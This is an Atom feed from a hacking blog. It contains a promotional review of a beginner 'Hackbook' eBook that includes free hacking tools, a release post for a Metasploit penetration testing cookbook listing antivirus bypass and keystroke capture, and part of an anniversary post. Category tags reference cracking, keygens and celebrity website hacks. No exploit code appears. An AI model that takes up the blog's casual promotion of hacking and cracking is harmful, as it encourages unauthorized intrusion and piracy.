<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7708828398385990720</id><updated>2018-07-30T10:16:41.313+05:30</updated><category term="technical article"/><category term="hacking"/><category term="cracking"/><category term="technology news"/><category term="hacking tutorial"/><category term="latest cyber news"/><category term="facebook"/><category term="software"/><category term="tips and tricks"/><category term="google"/><category term="crack"/><category term="cyber terror"/><category term="serials and keys"/><category term="windows"/><category term="hack a website/web server"/><category term="facebook spam"/><category term="hacking web applications"/><category term="sql injection tool"/><category term="windows 7"/><category term="windows hacking"/><category term="Kaspersky pure key"/><category term="anti virus"/><category term="google plus"/><category term="kaspersky antivirus 2012 key"/><category term="kaspersky internet security 2012 key"/><category term="facebook hacking"/><category term="ARP spoofing/poisoning"/><category term="assembly language"/><category term="email hacking"/><category term="exploit"/><category term="google plus invitation"/><category term="hacking software"/><category term="microsoft"/><category term="nmap"/><category term="reverse engineering"/><category term="wikileaks"/><category term="RAT"/><category term="anonymous hacking group"/><category term="backtrack"/><category term="cain and able"/><category term="cloud computing"/><category term="ebullience 2011"/><category term="f8 live streaming"/><category term="hack the darklord"/><category 
term="hacking gmail"/><category term="hacking questions"/><category term="idm 6 full download"/><category term="idm crack"/><category term="keyloggers"/><category term="port scanning"/><category term="webscarab"/><category term="windows firewall"/><category term="windows hackking"/><category term="wireshark"/><category term="#refref"/><category term="John the riper"/><category term="LOIC"/><category term="M.S Dhoni website hack"/><category term="Nessus"/><category term="OWASP webgoat"/><category term="Pangolin"/><category term="Priety zinta website hack"/><category term="Priyanka chopra website hack"/><category term="SOPA"/><category term="Search engine optimization"/><category term="THC Dos"/><category term="Windows 8"/><category term="android hacking"/><category term="anna hazare"/><category term="backup"/><category term="blog widgets"/><category term="blogging"/><category term="browser war"/><category term="crome"/><category term="difference between lokpal and jan lokpal"/><category term="download #refref"/><category term="download idm 6"/><category term="facebook timeline"/><category term="fake facebook wall"/><category term="fake twitter"/><category term="farmville hack"/><category term="hacking shopping websites/portals"/><category term="hacking survey sites"/><category term="honeypots"/><category term="internet censorship"/><category term="jan lokpal bill"/><category term="keygen"/><category term="online hacking challenge"/><category term="open source"/><category term="phishing"/><category term="rapidshare hacks"/><category term="recovery"/><category term="shady RAT"/><category term="steve jobs"/><category term="steve jobs dies"/><category term="super scan"/><category term="xss attack"/><title type='text'>Hacking Alert</title><subtitle type='html'>Computer Tricks and Hacks. 
Hacking Software and much more ...</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default?start-index=26&amp;max-results=25'/><author><name>John Jacob</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>236</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2210707295811261979</id><published>2013-10-24T19:39:00.000+05:30</published><updated>2013-10-24T19:39:45.902+05:30</updated><title type='text'>Review of Hackbook - Beginner&#39;s guide to hacking</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;Hello my dear readers. I recently bought this awesome eBook called &quot;&lt;a href=&quot;http://hackbook.net/&quot;&gt;Hackbook&lt;/a&gt;&quot;. I was surprised to find that it was very informative and useful even for a person like me who has been into hacking for quite a while now. 
As the author of the eBook is quite reputed in the hacking world.I did not hesitate to write a review of it.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-UPtCfmeLv_U/UmknNYMAYII/AAAAAAAAAns/ppH9Z-eZVL0/s1600/hack.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;300&quot; src=&quot;http://2.bp.blogspot.com/-UPtCfmeLv_U/UmknNYMAYII/AAAAAAAAAns/ppH9Z-eZVL0/s400/hack.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Non technical writing for easy understanding&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Descriptive screenshots to explain better&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Powerful Tools&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;50 Pages of &amp;nbsp;&quot;NO BULLSHIT&quot;&amp;nbsp;content&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Each section is independent of the previous section (Around 3-4 pages of each section)&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;/ol&gt;The above features is what is mentioned in their sample page. 
So I will address how far what they have stated there holds true for the buyer.&lt;br /&gt;&lt;br /&gt;First off, the writing. The writing isn&#39;t technical. COMPLETELY AGREED. But you will find that the usage of technical words becomes important later on in the eBook. The upside is that he explained EVERY single technical keyword at some point of time in the eBook. &lt;br /&gt;&lt;br /&gt;Second, the tools. I was quite surprised when I actually received Hacking Tools. I felt a bit dangerous for a second :P But the most important fact is that I didn&#39;t expect anyone to give away free hacking tools along with it. And along with the links that are available in the eBook, you can gather a Hell load of hacking arsenal and learn more than you can imagine.&lt;br /&gt;&lt;br /&gt;Third, coding. Though he doesn&#39;t teach you the whole of coding in the book (which is near impossible for any writer), he stressed well on the importance of learning coding to become a successful and professional Hacker.&lt;br /&gt;&lt;br /&gt;There is a hell load of pictures. The moment you read one of his screenshots you get a very good picture as to how to go about with the tool. The screenshots and &quot;In-Picture&quot; explanation are definitely a boost to the reading.&lt;br /&gt;&lt;br /&gt;And as far as NO BULLSHIT content is concerned. 
There is only an &quot;Introduction&quot; page which has according to be the only non- informational page on the eBook!&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red; font-size: large;&quot;&gt;&lt;b&gt;I say this is a MUST buy book for a newbie hacker!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Check out their Book&lt;b&gt;:&lt;/b&gt; &lt;a href=&quot;http://www.hackbook.net/&quot;&gt;&lt;b&gt;Hackbook - Learn How to Hack eBook&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2210707295811261979/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2013/10/review-of-hackbook-learn-how-to-hack.html#comment-form' title='18 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2210707295811261979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2210707295811261979'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2013/10/review-of-hackbook-learn-how-to-hack.html' title='Review of Hackbook - Beginner&#39;s guide to hacking'/><author><name>John Jacob</name><uri>https://plus.google.com/106998126784730523300</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-LAkRbpooLR0/AAAAAAAAAAI/AAAAAAAAAlc/fuxyxNyvKhM/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-UPtCfmeLv_U/UmknNYMAYII/AAAAAAAAAns/ppH9Z-eZVL0/s72-c/hack.jpg" height="72" 
width="72"/><thr:total>18</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-5188438052902961726</id><published>2012-08-23T21:37:00.000+05:30</published><updated>2012-08-23T21:37:02.871+05:30</updated><title type='text'>Metasploit penetration testing Cookbook released!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-size: 9.0pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-size: 9.0pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-ECx3T6Dw6ec/UDZUZCnV6TI/AAAAAAAABFY/PsPcAQBQdFc/s1600/book.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://2.bp.blogspot.com/-ECx3T6Dw6ec/UDZUZCnV6TI/AAAAAAAABFY/PsPcAQBQdFc/s320/book.jpg&quot; width=&quot;259&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-size: 9.0pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Metasploit® software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. 
The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;&lt;a href=&quot;http://www.packtpub.com/metasploit-penetration-testing-cookbook/book&quot; target=&quot;_blank&quot;&gt;MetasploitPenetration Testing Cookbook&lt;/a&gt;, By Abhinav Singh, targets both professionals and beginners to the framework. The chapters of the book are logically arranged with an increasing level of complexity and cover Metasploit aspects ranging from pre-exploitation to the post-exploitation phase thoroughly. The recipe structure of the book provides a good mix of both theoretical understanding and practical implementation.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;This book will help readers in thinking from a hacker’s perspective to dig out the flaws in target networks and also to leverage the powers of Metasploit to compromise them. It will take your penetration skills to the next level.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;The book starts with the basics such as gathering information about your target and gradually covers advanced topics like building your own framework scripts and modules. The book goes deep into operating systems-based penetration testing techniques and moves ahead with client-based exploitation methodologies. 
In the post- exploitation phase, it covers meterpreter, antivirus bypass, ruby wonders, exploit building, porting exploits to framework, and third party tools like armitage, and SET.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;What you will learn from this book&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l0 level1 lfo1; text-indent: -18.0pt;&quot;&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Set up a complete penetration testing environment using metasploit and virtual machines&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Learn to penetration-test popular operating systems such as Windows7, Windows 2008 Server, Ubuntu etc.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; 
line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Get familiar with penetration testing based on client side exploitation techniques with detailed analysis of vulnerabilities and codes&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Avail of exclusive coverage of antivirus bypassing techniques using metasploit&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Master post-exploitation techniques such as exploring the target, keystrokes capturing, sniffing, pivoting, setting persistent connections etc.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: 
-18pt;&quot;&gt;Build and analyze meterpreter scripts in Ruby&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Build and export exploits to framework&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Use extension tools like Armitage, SET etc.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;!--[if !supportLists]--&gt;&lt;br /&gt;                &lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Approach&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;This is a Cookbook which follows a practical task-based style. 
There are plenty of code and commands used for illustration which make your learning curve easy and quick.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Who this book is for&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;This book targets both professional penetration testers as well as new users of Metasploit who wish to gain expertise over the framework. The book requires basic knowledge of scanning, exploitation, and Ruby language.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Book Details&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Paperback: 268 pages&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Publisher: Packt Publishing (June 2012)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Language: English&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;ISBN-10: 1849517428&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;ISBN-13: 
978-1849517423&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;URL: &lt;/span&gt;&lt;span lang=&quot;EN-US&quot;&gt;&lt;a href=&quot;http://www.packtpub.com/metasploit-penetration-testing-cookbook/book&quot;&gt;&lt;span style=&quot;line-height: 115%;&quot;&gt;Metasploit Penetration Testing&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt; Cookbook(Free shipping in India)&lt;span style=&quot;font-size: 9pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/5188438052902961726/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/08/metasploit-penetration-testing-cookbook.html#comment-form' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/5188438052902961726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/5188438052902961726'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/08/metasploit-penetration-testing-cookbook.html' title='Metasploit penetration testing Cookbook released!'/><author><name>abhinav 
singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-ECx3T6Dw6ec/UDZUZCnV6TI/AAAAAAAABFY/PsPcAQBQdFc/s72-c/book.jpg" height="72" width="72"/><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2593672862184553912</id><published>2012-01-24T01:23:00.000+05:30</published><updated>2012-01-24T01:24:17.092+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>From free blog hosting to International Author - A journey of 3 years</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/--umUwyJcDh8/Tx25Nh93p3I/AAAAAAAABCg/u67WG7vDDrE/s1600/three.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/--umUwyJcDh8/Tx25Nh93p3I/AAAAAAAABCg/u67WG7vDDrE/s1600/three.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello Friends and readers. 
Today HackingAlert completes its 3 years of operation. First of all I would like to apologize for the delay in posts these days as I got a bit busy with relocating to another city. I will be actively blogging again from next month.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Today is a day of celebration for HackingAlert. The blog has completed 3 years of tough yet successful operation. Over the course of time the blog grew slowly and slowly to make an impact in this huge world of web. Writing this post reminds me about the first blog post which was &quot;what is hacking&quot;. I struggled a lot while writing it. It was a small post, but while I was writing that post I had never imagined that one day this blog would do wonders for me. It not only helped me in enhancing my knowledge and sharing it, it also helped me to give back something to the community from where I have learnt so much. Over time, the&amp;nbsp;appreciation&amp;nbsp;and criticism made me stronger and forced me to take blogging more seriously. Today I can proudly say that HackingAlert has made a space in the world wide web. Let me take you through some of the stats:&lt;br /&gt;&lt;br /&gt;In the past 3 years HackingAlert has&amp;nbsp;traveled&amp;nbsp;all the way from an Alexa rank of around 30 million (3 crore) to 1.3 lakh. 
